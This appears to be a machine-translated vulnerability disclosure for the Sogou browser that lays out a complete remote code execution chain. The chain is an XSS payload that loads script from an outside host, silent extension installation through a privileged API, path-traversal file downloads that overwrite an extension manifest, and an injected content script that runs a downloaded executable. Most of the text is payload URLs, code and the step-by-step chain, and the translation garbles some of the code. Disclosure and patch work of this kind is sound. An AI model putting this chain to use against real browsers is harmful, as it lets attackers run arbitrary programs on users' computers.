Sogou browser vulnerabilities are backdoor every day after recruitment

Sogou browser vulnerabilities are backdoor every day after recruitment

I heard that sogou's input method is quite good.

1. The latest version is 5.3.6.16631 (the previous vulnerability version is 5.2.5.15987), but the previous vulnerability has not been fixed seriously.



2. Although xss has been repaired, it can still be used without being repaired. For example, to load an external JS: http://x.com/poc/sogou5.2.js



Http://v.sogou.com/vc/play/redirect.jsp? Url = http://live.wasu.cn/show/id/480'). close (); function open () {}; if (! Window. _ x) {window. _ x = 1; var s = document. createElement ('script'); s. src = '// x.com/poc/sogou5.2.js? '% 2bMath. random (); document. body. appendChild (s) ;}; a = open ('A', '& type = zhibo_vr & tvstation = % C7 % E0 % BA % A3 % CE % C0 % CA % D3



3. window. open ("se ://... "). external's problem of obtaining high-Permission external remains unsolved, so the method in the previous vulnerability is still valid (WooYun: 5 remote command execution by sogou browser ).



This means that you can still perform the Silent Installation of com. sogou. cxj009.PicViewer: the extension, and the XSS vulnerability of the extension has not been fixed. The previously reported defects in downloading arbitrary files to a specified local directory have not been fixed (WooYun: 4 ).



4. com. sogou. feichuan is installed with 1.0.0.23 by default. This version does not contain the command execution API described in the previous vulnerability. However, if you install it on 1.0.0.26, the previous vulnerability can still be used successfully.



5. Assume that the user is installed with com. sogou. feichuan of version 1.0.0.23. We will not use this extension to use it in another way.



6. The method is as follows:



A. Defects in downloading the file com. sogou. cxj009.PicViewer to any directory (WooYun: sogou Browser Remote Command Execution 4 ).

B. Download three files respectively.

Http://x.com/poc/sogou.xml --> ../.. \ Roaming \ SogouExplorer \ Extension \ com. sogou. gamecenter \ 1.1.0 \ manifest. xml

Http://x.com/poc/hehe.js --> ../.. \ Roaming \ SogouExplorer \ Extension \ com. sogou. gamecenter \ 1.1.0 \ hehe. js

Http://x.com/poc/calcx.exe --> ../.. \ Roaming \ SogouExplorer \ Extension \ com. sogou. gamecenter \ 1.1.0 \ sogouminigamepacker.exe



The first file is used to modify the manifest. xml extension of com. sogou. gamecenter. It mainly modifies two points,



1 is to add public = "true" for plugin so that the plugin can be exposed to any page.







Application/sogou-start-gamecenter-lite-plugin







2. Add a content script so that every webpage loads the code in hehe. js.







Hehe. js

*://*/*







The second file is the loaded hehe. js. The Code is as follows:



// Embed an application/sogou-start-gamecenter-lite-plugin in the page

Var a = document. createElement ("div ");

A. innerHTML ='';

Document. body. appendChild ();



// Call startExe of application/sogou-start-gamecenter-lite-plugin on the page to execute the exe in the specified path

// Configure

Var B = document. createElement ("script ");

B. innerHTML = 'document. getElementById ("embed1 "). startExe (".. /.. /Roaming/SogouExplorer/Extension/com. sogou. gamecenter/1.1.0/\ u0000 ","/popgame ", function (){})';

Document. body. appendChild (B );



The third file is the sogouminigamepacker.exe to be executed by the code in hehe. js.



C. When a user accesses an attack page, the attacker will release the above three files,

When you open a browser next time, you can open any page and call the content script hehe. js. Then, use the startexeiterator of the public application/sogou-start-gamecenter-lite-plugin to execute the downloaded sogouminigamepacker.exe.



The process is shown in:


 

7. Specific use process:



Http://x.com/poc/sogou_combine2.htm

|

Http://v.sogou.com/vc/play/redirect.jsp (XSS vulnerability)

|

Http://x.com/poc/sogou5.2.js (call)

|

Window. open ("se: // sidebarextmanager/index.html "). external. extension ("installExtFromSidebarBox", "com. sogou. cxj009.PicViewer ",...) (call high-Permission external to install com. sogou. cxj009.PicViewer)

|

Http://v.sogou.com/vc/play/redirect.jsp (exploiting this XSS vulnerability again)

|

Http://x.com/poc/sogou5.3.js (call)

|

Se-extension: // ext-1588466412/v.html (using the XSS vulnerability of com. sogou. cxj009.PicViewer and download API)

|

Document. getElementById ("picdownloader"). download (three download processes in Step 6)

|

The next time you use the sogou browser, execute the last embedded EXE.



7. The final use effect is as follows:


 

 

 

In the test code, com. sogou. gamecenter is version 1.1.0, and a new version 1.2.0 is available, but this does not affect the usage in the text. You only need to change the sogou. xml version and 1.1.0 in the code path to 1.2.0.
 

Solution:

Mainly for Windows. open ("se ://... "). external repair, and prevent such malicious manifest modification. the xml behavior should be related to manifest. check for xml changes.